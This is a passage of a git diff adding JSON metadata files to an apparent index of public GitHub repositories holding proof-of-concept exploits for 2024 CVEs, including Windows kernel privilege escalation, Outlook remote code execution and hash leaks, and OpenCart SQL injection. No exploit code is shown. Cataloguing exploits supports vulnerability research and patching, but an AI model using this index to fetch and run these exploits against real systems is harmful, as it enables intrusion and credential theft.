+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99059183?v=4",
+ "html_url": "https:\/\/github.com\/hakaioffsec"
+ },
+ "html_url": "https:\/\/github.com\/hakaioffsec\/CVE-2024-21338",
+ "description": "Local Privilege Escalation from Admin to Kernel vulnerability on Windows 10 and Windows 11 operating systems with HVCI enabled.",
+ "fork": false,
+ "created_at": "2024-04-13T05:53:02Z",
+ "updated_at": "2024-06-26T06:02:48Z",
+ "pushed_at": "2024-04-16T21:00:14Z",
+ "stargazers_count": 242,
+ "watchers_count": 242,
+ "has_discussions": false,
+ "forks_count": 56,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 56,
+ "watchers": 242,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 787860602,
+ "name": "CVE-2024-21338",
+ "full_name": "UMU618\/CVE-2024-21338",
+ "owner": {
+ "login": "UMU618",
+ "id": 1729732,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1729732?v=4",
+ "html_url": "https:\/\/github.com\/UMU618"
+ },
+ "html_url": "https:\/\/github.com\/UMU618\/CVE-2024-21338",
+ "description": "Fork of https:\/\/github.com\/hakaioffsec\/CVE-2024-21338",
+ "fork": false,
+ "created_at": "2024-04-17T10:16:21Z",
+ "updated_at": "2024-06-26T06:01:33Z",
+ "pushed_at": "2024-04-17T10:33:05Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 790920623,
+ "name": "CVE-2024-21338",
+ "full_name": "varwara\/CVE-2024-21338",
+ "owner": {
+ "login": "varwara",
+ "id": 167913816,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/167913816?v=4",
+ "html_url": "https:\/\/github.com\/varwara"
+ },
+ "html_url": "https:\/\/github.com\/varwara\/CVE-2024-21338",
+ "description": "PoC for the Untrusted Pointer Dereference in the appid.sys driver",
+ "fork": false,
+ "created_at": "2024-04-23T19:09:22Z",
+ "updated_at": "2024-06-13T04:54:07Z",
+ "pushed_at": "2024-04-23T19:13:53Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 802543804,
+ "name": "CVE-2024-21338-x64-build-",
+ "full_name": "Zombie-Kaiser\/CVE-2024-21338-x64-build-",
+ "owner": {
+ "login": "Zombie-Kaiser",
+ "id": 141570642,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141570642?v=4",
+ "html_url": "https:\/\/github.com\/Zombie-Kaiser"
+ },
+ "html_url": "https:\/\/github.com\/Zombie-Kaiser\/CVE-2024-21338-x64-build-",
+ "description": "Local Privilege Escalation from Admin to Kernel vulnerability on Windows 10 and Windows 11 operating systems with HVCI enabled.",
+ "fork": false,
+ "created_at": "2024-05-18T15:38:34Z",
+ "updated_at": "2024-06-13T03:10:45Z",
+ "pushed_at": "2024-05-22T17:06:06Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 818876565,
+ "name": "CVE-2024-21338_PoC",
+ "full_name": "tykawaii98\/CVE-2024-21338_PoC",
+ "owner": {
+ "login": "tykawaii98",
+ "id": 45362197,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45362197?v=4",
+ "html_url": "https:\/\/github.com\/tykawaii98"
+ },
+ "html_url": "https:\/\/github.com\/tykawaii98\/CVE-2024-21338_PoC",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-23T06:03:44Z",
+ "updated_at": "2024-06-26T06:00:48Z",
+ "pushed_at": "2024-06-23T06:09:10Z",
+ "stargazers_count": 28,
+ "watchers_count": 28,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 28,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-21345.json b/2024/CVE-2024-21345.json
new file mode 100644
index 0000000000..39abd3f9eb
--- /dev/null
+++ b/2024/CVE-2024-21345.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 792426232,
+ "name": "CVE-2024-21345",
+ "full_name": "exploits-forsale\/CVE-2024-21345",
+ "owner": {
+ "login": "exploits-forsale",
+ "id": 168065072,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168065072?v=4",
+ "html_url": "https:\/\/github.com\/exploits-forsale"
+ },
+ "html_url": "https:\/\/github.com\/exploits-forsale\/CVE-2024-21345",
+ "description": "Proof-of-Concept for CVE-2024-21345",
+ "fork": false,
+ "created_at": "2024-04-26T16:38:17Z",
+ "updated_at": "2024-06-22T18:39:44Z",
+ "pushed_at": "2024-04-26T16:39:48Z",
+ "stargazers_count": 66,
+ "watchers_count": 66,
+ "has_discussions": false,
+ "forks_count": 19,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 19,
+ "watchers": 66,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 793265049,
+ "name": "CVE-2024-21345",
+ "full_name": "FoxyProxys\/CVE-2024-21345",
+ "owner": {
+ "login": "FoxyProxys",
+ "id": 166161106,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/166161106?v=4",
+ "html_url": "https:\/\/github.com\/FoxyProxys"
+ },
+ "html_url": "https:\/\/github.com\/FoxyProxys\/CVE-2024-21345",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-28T21:36:33Z",
+ "updated_at": "2024-04-28T21:44:18Z",
+ "pushed_at": "2024-04-28T21:44:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-21378.json b/2024/CVE-2024-21378.json
new file mode 100644
index 0000000000..b10c9e2cf1
--- /dev/null
+++ b/2024/CVE-2024-21378.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 770999935,
+ "name": "CVE-2024-21378",
+ "full_name": "d0rb\/CVE-2024-21378",
+ "owner": {
+ "login": "d0rb",
+ "id": 10403781,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4",
+ "html_url": "https:\/\/github.com\/d0rb"
+ },
+ "html_url": "https:\/\/github.com\/d0rb\/CVE-2024-21378",
+ "description": "This repository contains an exploit for targeting Microsoft Outlook through Exchange Online, leveraging a vulnerability to execute arbitrary code via COM DLLs. The exploit utilizes a modified version of Ruler to send a malicious form as an email, triggering the execution upon user interaction within the Outlook thick client.",
+ "fork": false,
+ "created_at": "2024-03-12T14:11:58Z",
+ "updated_at": "2024-06-21T12:45:30Z",
+ "pushed_at": "2024-03-13T18:34:57Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-21388.json b/2024/CVE-2024-21388.json
new file mode 100644
index 0000000000..5678ce5919
--- /dev/null
+++ b/2024/CVE-2024-21388.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 778727781,
+ "name": "CVE-2024-21388",
+ "full_name": "d0rb\/CVE-2024-21388",
+ "owner": {
+ "login": "d0rb",
+ "id": 10403781,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4",
+ "html_url": "https:\/\/github.com\/d0rb"
+ },
+ "html_url": "https:\/\/github.com\/d0rb\/CVE-2024-21388",
+ "description": "This Python script exploits a vulnerability (CVE-2024-21388) in Microsoft Edge, allowing silent installation of browser extensions with elevated privileges via a private API.",
+ "fork": false,
+ "created_at": "2024-03-28T09:31:31Z",
+ "updated_at": "2024-04-20T08:35:16Z",
+ "pushed_at": "2024-03-28T09:33:23Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-21412.json b/2024/CVE-2024-21412.json
new file mode 100644
index 0000000000..426d6bfa78
--- /dev/null
+++ b/2024/CVE-2024-21412.json
@@ -0,0 +1,37 @@
+[
+ {
+ "id": 775557259,
+ "name": "CVE-2024-21412_Water-Hydra",
+ "full_name": "lsr00ter\/CVE-2024-21412_Water-Hydra",
+ "owner": {
+ "login": "lsr00ter",
+ "id": 3685107,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3685107?v=4",
+ "html_url": "https:\/\/github.com\/lsr00ter"
+ },
+ "html_url": "https:\/\/github.com\/lsr00ter\/CVE-2024-21412_Water-Hydra",
+ "description": "according to trendmicro's research",
+ "fork": false,
+ "created_at": "2024-03-21T15:57:51Z",
+ "updated_at": "2024-05-27T19:12:29Z",
+ "pushed_at": "2024-03-21T16:02:54Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "initial-access",
+ "malware",
+ "redteam",
+ "windows"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-21413.json b/2024/CVE-2024-21413.json
new file mode 100644
index 0000000000..59564a8aba
--- /dev/null
+++ b/2024/CVE-2024-21413.json
@@ -0,0 +1,362 @@
+[
+ {
+ "id": 758191027,
+ "name": "CVE-2024-21413",
+ "full_name": "duy-31\/CVE-2024-21413",
+ "owner": {
+ "login": "duy-31",
+ "id": 20819326,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20819326?v=4",
+ "html_url": "https:\/\/github.com\/duy-31"
+ },
+ "html_url": "https:\/\/github.com\/duy-31\/CVE-2024-21413",
+ "description": "Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - Expect Script POC",
+ "fork": false,
+ "created_at": "2024-02-15T19:57:38Z",
+ "updated_at": "2024-06-10T05:18:51Z",
+ "pushed_at": "2024-02-17T07:08:49Z",
+ "stargazers_count": 149,
+ "watchers_count": 149,
+ "has_discussions": false,
+ "forks_count": 33,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 33,
+ "watchers": 149,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 758555813,
+ "name": "CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability",
+ "full_name": "xaitax\/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability",
+ "owner": {
+ "login": "xaitax",
+ "id": 5014849,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5014849?v=4",
+ "html_url": "https:\/\/github.com\/xaitax"
+ },
+ "html_url": "https:\/\/github.com\/xaitax\/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability",
+ "description": "Microsoft-Outlook-Remote-Code-Execution-Vulnerability",
+ "fork": false,
+ "created_at": "2024-02-16T15:17:59Z",
+ "updated_at": "2024-06-25T10:23:01Z",
+ "pushed_at": "2024-02-19T20:00:35Z",
+ "stargazers_count": 639,
+ "watchers_count": 639,
+ "has_discussions": false,
+ "forks_count": 141,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 141,
+ "watchers": 639,
+ "score": 0,
+ "subscribers_count": 9
+ },
+ {
+ "id": 758688293,
+ "name": "CVE-2024-21413-POC",
+ "full_name": "r00tb1t\/CVE-2024-21413-POC",
+ "owner": {
+ "login": "r00tb1t",
+ "id": 150359865,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/150359865?v=4",
+ "html_url": "https:\/\/github.com\/r00tb1t"
+ },
+ "html_url": "https:\/\/github.com\/r00tb1t\/CVE-2024-21413-POC",
+ "description": "Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - CVE-2024-21413 POC",
+ "fork": false,
+ "created_at": "2024-02-16T21:10:31Z",
+ "updated_at": "2024-05-19T05:08:09Z",
+ "pushed_at": "2024-02-16T22:23:37Z",
+ "stargazers_count": 14,
+ "watchers_count": 14,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 14,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 758949379,
+ "name": "CVE-2024-21413",
+ "full_name": "CMNatic\/CVE-2024-21413",
+ "owner": {
+ "login": "CMNatic",
+ "id": 4163116,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4163116?v=4",
+ "html_url": "https:\/\/github.com\/CMNatic"
+ },
+ "html_url": "https:\/\/github.com\/CMNatic\/CVE-2024-21413",
+ "description": "CVE-2024-21413 PoC for THM Lab",
+ "fork": false,
+ "created_at": "2024-02-17T14:52:52Z",
+ "updated_at": "2024-06-16T17:36:59Z",
+ "pushed_at": "2024-03-13T02:44:28Z",
+ "stargazers_count": 27,
+ "watchers_count": 27,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 27,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 759610035,
+ "name": "CVE-2024-21413",
+ "full_name": "MSeymenD\/CVE-2024-21413",
+ "owner": {
+ "login": "MSeymenD",
+ "id": 83572774,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83572774?v=4",
+ "html_url": "https:\/\/github.com\/MSeymenD"
+ },
+ "html_url": "https:\/\/github.com\/MSeymenD\/CVE-2024-21413",
+ "description": "CVE-2024-21413 Açığını Kullanarak Giriş Bilgilerini Alma",
+ "fork": false,
+ "created_at": "2024-02-19T01:37:15Z",
+ "updated_at": "2024-02-19T01:48:46Z",
+ "pushed_at": "2024-02-19T01:54:11Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 760445057,
+ "name": "CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability",
+ "full_name": "Mdusmandasthaheer\/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability",
+ "owner": {
+ "login": "Mdusmandasthaheer",
+ "id": 122736342,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122736342?v=4",
+ "html_url": "https:\/\/github.com\/Mdusmandasthaheer"
+ },
+ "html_url": "https:\/\/github.com\/Mdusmandasthaheer\/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-20T12:41:15Z",
+ "updated_at": "2024-05-07T03:11:46Z",
+ "pushed_at": "2024-02-20T13:37:39Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 762261193,
+ "name": "CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability",
+ "full_name": "ahmetkarakayaoffical\/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability",
+ "owner": {
+ "login": "ahmetkarakayaoffical",
+ "id": 100443477,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100443477?v=4",
+ "html_url": "https:\/\/github.com\/ahmetkarakayaoffical"
+ },
+ "html_url": "https:\/\/github.com\/ahmetkarakayaoffical\/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability",
+ "description": "Bu betik, Microsoft Outlook'ta keşfedilen ve CVSS değeri 9.8 olan önemli bir güvenlik açığı olan CVE-2024-21413 için bir kavram kanıtı (PoC) sunmaktadır. MonikerLink hatası olarak adlandırılan bu güvenlik açığı, yerel NTLM bilgilerinin potansiyel sızıntısı ve uzaktan kod çalıştırma olasılığı dahil olmak üzere geniş kapsamlı etkilere sahiptir.",
+ "fork": false,
+ "created_at": "2024-02-23T12:13:11Z",
+ "updated_at": "2024-04-02T15:01:16Z",
+ "pushed_at": "2024-02-24T15:36:22Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 764499042,
+ "name": "CVE-2024-21413",
+ "full_name": "DevAkabari\/CVE-2024-21413",
+ "owner": {
+ "login": "DevAkabari",
+ "id": 67256448,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67256448?v=4",
+ "html_url": "https:\/\/github.com\/DevAkabari"
+ },
+ "html_url": "https:\/\/github.com\/DevAkabari\/CVE-2024-21413",
+ "description": "CVE-2024-21413 exploit",
+ "fork": false,
+ "created_at": "2024-02-28T07:26:24Z",
+ "updated_at": "2024-02-28T09:37:24Z",
+ "pushed_at": "2024-02-28T07:26:52Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 765116138,
+ "name": "CVE-2024-21413",
+ "full_name": "dshabani96\/CVE-2024-21413",
+ "owner": {
+ "login": "dshabani96",
+ "id": 107131685,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107131685?v=4",
+ "html_url": "https:\/\/github.com\/dshabani96"
+ },
+ "html_url": "https:\/\/github.com\/dshabani96\/CVE-2024-21413",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-29T10:07:34Z",
+ "updated_at": "2024-03-13T04:12:36Z",
+ "pushed_at": "2024-02-29T13:22:17Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 795596778,
+ "name": "CVE-2024-21413-Microsoft-Outlook-RCE-Exploit",
+ "full_name": "X-Projetion\/CVE-2024-21413-Microsoft-Outlook-RCE-Exploit",
+ "owner": {
+ "login": "X-Projetion",
+ "id": 161194427,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161194427?v=4",
+ "html_url": "https:\/\/github.com\/X-Projetion"
+ },
+ "html_url": "https:\/\/github.com\/X-Projetion\/CVE-2024-21413-Microsoft-Outlook-RCE-Exploit",
+ "description": "CVE-2024-21413 Microsoft Outlook RCE Exploit",
+ "fork": false,
+ "created_at": "2024-05-03T16:09:54Z",
+ "updated_at": "2024-05-28T17:38:25Z",
+ "pushed_at": "2024-05-03T16:11:46Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 799194864,
+ "name": "CVE-2024-21413",
+ "full_name": "th3Hellion\/CVE-2024-21413",
+ "owner": {
+ "login": "th3Hellion",
+ "id": 93284551,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93284551?v=4",
+ "html_url": "https:\/\/github.com\/th3Hellion"
+ },
+ "html_url": "https:\/\/github.com\/th3Hellion\/CVE-2024-21413",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-11T12:28:22Z",
+ "updated_at": "2024-05-11T12:34:27Z",
+ "pushed_at": "2024-05-11T12:34:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 816689478,
+ "name": "CVE-2024-21413",
+ "full_name": "ShubhamKanhere307\/CVE-2024-21413",
+ "owner": {
+ "login": "ShubhamKanhere307",
+ "id": 173140854,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/173140854?v=4",
+ "html_url": "https:\/\/github.com\/ShubhamKanhere307"
+ },
+ "html_url": "https:\/\/github.com\/ShubhamKanhere307\/CVE-2024-21413",
+ "description": "This script is the Proof of Concept (PoC) of the CVE-2024-21413, a significant security vulnerability discovered in the Microsoft Windows Outlook having a strong 9.8 critical CVSS score. Named as #MonikerLink Bug, this vulnerability allows the attacker to execute the arbitrary code remotely on the victim's machine, thus becomes a full-fledged RCE. ",
+ "fork": false,
+ "created_at": "2024-06-18T08:11:33Z",
+ "updated_at": "2024-06-18T08:18:16Z",
+ "pushed_at": "2024-06-18T08:18:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-21514.json b/2024/CVE-2024-21514.json
new file mode 100644
index 0000000000..f33b414680
--- /dev/null
+++ b/2024/CVE-2024-21514.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 818819540,
+ "name": "CVE-2024-21514",
+ "full_name": "bigb0x\/CVE-2024-21514",
+ "owner": {
+ "login": "bigb0x",
+ "id": 13532434,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4",
+ "html_url": "https:\/\/github.com\/bigb0x"
+ },
+ "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-21514",
+ "description": "SQL Injection POC for CVE-2024-21514: Divido payment extension for OpenCart",
+ "fork": false,
+ "created_at": "2024-06-23T00:55:00Z",
+ "updated_at": "2024-06-26T04:27:50Z",
+ "pushed_at": "2024-06-23T01:08:17Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-21626.json b/2024/CVE-2024-21626.json
new file mode 100644
index 0000000000..b9545fe324
--- /dev/null
+++ b/2024/CVE-2024-21626.json
@@ -0,0 +1,332 @@
+[
+ {
+ "id": 751354058,
+ "name": "CVE-2024-21626-POC",
+ "full_name": "zpxlz\/CVE-2024-21626-POC",
+ "owner": {
+ "login": "zpxlz",
+ "id": 89461075,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89461075?v=4",
+ "html_url": "https:\/\/github.com\/zpxlz"
+ },
+ "html_url": "https:\/\/github.com\/zpxlz\/CVE-2024-21626-POC",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-01T12:53:18Z",
+ "updated_at": "2024-02-02T09:26:46Z",
+ "pushed_at": "2024-02-01T20:19:03Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 751422888,
+ "name": "CVE-2024-21626",
+ "full_name": "NitroCao\/CVE-2024-21626",
+ "owner": {
+ "login": "NitroCao",
+ "id": 17915615,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17915615?v=4",
+ "html_url": "https:\/\/github.com\/NitroCao"
+ },
+ "html_url": "https:\/\/github.com\/NitroCao\/CVE-2024-21626",
+ "description": "PoC and Detection for CVE-2024-21626",
+ "fork": false,
+ "created_at": "2024-02-01T15:28:37Z",
+ "updated_at": "2024-05-23T11:10:42Z",
+ "pushed_at": "2024-02-06T16:09:05Z",
+ "stargazers_count": 62,
+ "watchers_count": 62,
+ "has_discussions": false,
+ "forks_count": 10,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 10,
+ "watchers": 62,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 751649154,
+ "name": "CVE-2024-21626-POC",
+ "full_name": "Wall1e\/CVE-2024-21626-POC",
+ "owner": {
+ "login": "Wall1e",
+ "id": 46126287,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46126287?v=4",
+ "html_url": "https:\/\/github.com\/Wall1e"
+ },
+ "html_url": "https:\/\/github.com\/Wall1e\/CVE-2024-21626-POC",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-02T02:51:29Z",
+ "updated_at": "2024-06-21T00:12:00Z",
+ "pushed_at": "2024-02-02T09:49:34Z",
+ "stargazers_count": 15,
+ "watchers_count": 15,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 15,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 751664848,
+ "name": "CVE-2024-21626",
+ "full_name": "cdxiaodong\/CVE-2024-21626",
+ "owner": {
+ "login": "cdxiaodong",
+ "id": 84082748,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84082748?v=4",
+ "html_url": "https:\/\/github.com\/cdxiaodong"
+ },
+ "html_url": "https:\/\/github.com\/cdxiaodong\/CVE-2024-21626",
+ "description": "CVE-2024-21626-poc-research-Reappearance-andtodo",
+ "fork": false,
+ "created_at": "2024-02-02T03:56:03Z",
+ "updated_at": "2024-04-21T01:29:16Z",
+ "pushed_at": "2024-02-02T04:56:50Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 751707713,
+ "name": "CVE-2024-21626",
+ "full_name": "zhangguanzhang\/CVE-2024-21626",
+ "owner": {
+ "login": "zhangguanzhang",
+ "id": 18641678,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18641678?v=4",
+ "html_url": "https:\/\/github.com\/zhangguanzhang"
+ },
+ "html_url": "https:\/\/github.com\/zhangguanzhang\/CVE-2024-21626",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-02T06:34:16Z",
+ "updated_at": "2024-02-05T19:02:10Z",
+ "pushed_at": "2024-02-02T09:53:25Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 751817784,
+ "name": "CVE-2024-21626-demo",
+ "full_name": "laysakura\/CVE-2024-21626-demo",
+ "owner": {
+ "login": "laysakura",
+ "id": 498788,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/498788?v=4",
+ "html_url": "https:\/\/github.com\/laysakura"
+ },
